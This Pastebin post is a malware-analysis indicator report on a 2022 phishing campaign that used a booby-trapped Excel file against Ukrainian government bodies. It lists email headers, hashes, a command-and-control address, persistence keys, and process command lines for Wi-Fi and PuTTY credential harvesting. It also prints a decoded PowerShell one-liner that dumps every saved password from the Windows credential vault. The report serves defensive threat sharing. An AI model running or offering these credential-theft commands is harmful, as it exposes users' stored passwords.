Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Elephant #GrimPlant #GraphSteel #Hobot
- https://pastebin.com/Z9PLqtpE
- previous_contact: n/a
- FAQ:
- https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/
- https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/
- https://cert.gov.ua/article/39882
- https://excelvba.ru/code/tools/Attachments
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant
- attack_vector
- --------------
- email > XLS > VBA > extract EXE1 (base64) > get EXE2 > get EXE3 > get EXE4 > exfil to 212.192.246.115
- # # # # # # # #
- email_headers
- # # # # # # # #
- Received: from mail3.nest.vn.ua ([193.243.158.20])
- Received: from WINR8K088HRVJH (unknown [87.249.139.170]) by mail3.nest.vn.ua (Postfix) with ESMTPSA id F265D342979
- From: "trembitskyy@vndsp.gov.ua" <trembitskyy@vndsp.gov.ua>
- X-Mailer: Smart_Send_4_4_2
- Date: Thu, 28 Apr 2022 01:46:40 +0300
- Message-ID: <7304491317264122489710@WIN-R8K088HRVJH>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b First Submission 2022-04-26 07:12:50 UTC
- File name Aid request COVID-19-04_5_22--.xls [ MS Excel Spreadsheet + SheetForAttachedFiles]
- File size 9.44 MB (9897472 bytes)
- SHA-256 ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69 First Submission 2022-04-26 07:37:22 UTC
- File name base_update.exe _dropper_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 4.29 MB (4499408 bytes)
- SHA-256 f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41 First Submission 2022-04-22 15:49:06 UTC
- File name java-sdk.exe _downloader_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 5.90 MB (6191616 bytes)
- SHA-256 aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79 First Submission 2022-04-26 07:53:56 UTC
- File name oracle-java.exe _implant_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 9.55 MB (10016256 bytes)
- SHA-256 47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878 First Submission 2022-04-24 14:03:56 UTC
- File name microsoft-cortana.exe _client_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 9.04 MB (9481728 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR 212.192.246.115/i - get downloader java-sdk.exe
- 212.192.246.115/p - get implant oracle-java.exe
- 212.192.246.115/m - get client microsoft-cortana.exe
- C2 212.192.246.115/c
- netwrk
- --------------
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /i HTTP/1.1 -hobot-
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /p HTTP/1.1 -hobot-
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /m HTTP/1.1 -hobot-
- 3.220.57.224 api.ipify.org 443 TLSv1 Client Hello
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /c HTTP/1.1 -hobot-
- comp
- --------------
- base_update.exe 2952 212.192.246.115 443 ESTABLISHED
- java-sdk.exe 3684 212.192.246.115 443 ESTABLISHED
- oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
- oracle-java.exe 1088 3.220.57.224 443 ESTABLISHED
- microsoft-cortana.exe 1412 212.192.246.115 443 ESTABLISHED
- microsoft-cortana.exe 1412 3.220.57.224 443 ESTABLISHED
- oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
- C:\tmp\base_update.exe
- C:\Users\operator/.java-sdk/java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
- C:\Users\operator/.java-sdk/oracle-java.exe -addr YdlP+kKrV+icT7cT1PCcwA==
- C:\Users\operator/.java-sdk/microsoft-cortana.exe -addr YdlP+kKrV+icT7cT1PCcwA==
- C:\Windows\system32\cmd.exe /Q /C netsh wlan show profiles
- C:\Windows\system32\netsh.exe wlan show profiles
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXA...
- C:\Windows\system32\cmd.exe /Q /C powershell reg query HKCU\Software\SimonTatham\Putty\Sessions
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe reg query HKCU\Software\SimonTatham\Putty\Sessions
- C:\Windows\system32\reg.exe query HKCU\Software\SimonTatham\Putty\Sessions
- . . .
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28.04.2022 16:24
- Java-SDK c:\users\operator\.java-sdk\java-sdk.exe 01.01.1970 3:00
- C:\Users\operator\.java-sdk\java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
- drop
- --------------
- %tmp%\base_update.exe
- %tmp%\prefix954622903
- %tmp%\prefix...
- C:\Users\%user%\.java-sdk\java-sdk.exe
- C:\Users\%user%\.java-sdk\microsoft-cortana.exe
- C:\Users\%user%\.java-sdk\oracle-java.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- xls metadata
- --------------
- File Name : Aid request COVID-19-04_5_22--.xls
- Directory : .
- File Size : 9.4 MiB
- File Modification Date/Time : 2022:04:28 09:35:09+03:00
- File Access Date/Time : 2022:04:28 16:22:14+03:00
- File Inode Change Date/Time : 2022:04:28 16:22:05+03:00
- File Permissions : -rw-rw-r--
- File Type : XLS
- File Type Extension : xls
- MIME Type : application/vnd.ms-excel
- Title :
- Subject :
- Author : Apache POI
- Comments :
- Template :
- Last Modified By : Пользователь
- Revision Number : 1
- Software : Microsoft Excel
- Total Edit Time : 1.0 minutes
- Create Date : 2020:04:30 13:56:23
- Modify Date : 2022:04:21 18:56:05
- Security : Password protected
- App Version : 16.0000
- Scale Crop : No
- Links Up To Date : No
- Shared Doc : No
- Hyperlinks Changed : No
- Title Of Parts : All request, Ministry of Defense, Updating data, Ministry of Economy, Ministry of Education%Science, Ministry of Energy&Environment, Ministry of Finance, Ministry of Health, Ministry of Infrastructure, Ministry of Internal Affairs, Ministry of Justice, Ministry of Reintegration, Ministry of Social Policy, National Guard, National Police, State Audit Service, State Border Guard Service, State Customs Service, State Emergency Service, State Fiscal Service, State Security Service, State Service of Special Commun, State Service for Geodesy, State Tax Service
- Heading Pairs : Листы, 24
- Code Page : Windows Cyrillic
- Direction : EngRus**
- Translated : -1
- Comp Obj User Type Len : 27
- Comp Obj User Type : .���� Microsoft Excel 2003
- powershell decoded & deobfuscated
- ----------------------------------
- [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | Format-Table -HideTableHeaders
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- Dropped files
- **************
- https://www.virustotal.com/gui/file/8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b/details
- https://www.virustotal.com/gui/file/ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69/details
- https://analyze.intezer.com/analyses/7352b66e-04e6-4b8a-b0b6-97443570103e
- https://www.virustotal.com/gui/file/f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41/details
- https://analyze.intezer.com/analyses/113ed91f-51cf-4a7d-abc7-d4a61e03bf03
- https://www.virustotal.com/gui/file/aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79/details
- https://analyze.intezer.com/analyses/4662ac0b-a3a2-4259-86c9-875739feb102
- https://www.virustotal.com/gui/file/47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878/details
- https://analyze.intezer.com/analyses/ae7a608e-c54c-4e19-a2fb-c217646c4e3b
- PL_SCR
- **************
- https://www.virustotal.com/gui/ip-address/212.192.246.115/details
- C2
- **************
- https://www.virustotal.com/gui/ip-address/212.192.246.115/details
- VR
Add Comment
Please, Sign In to add comment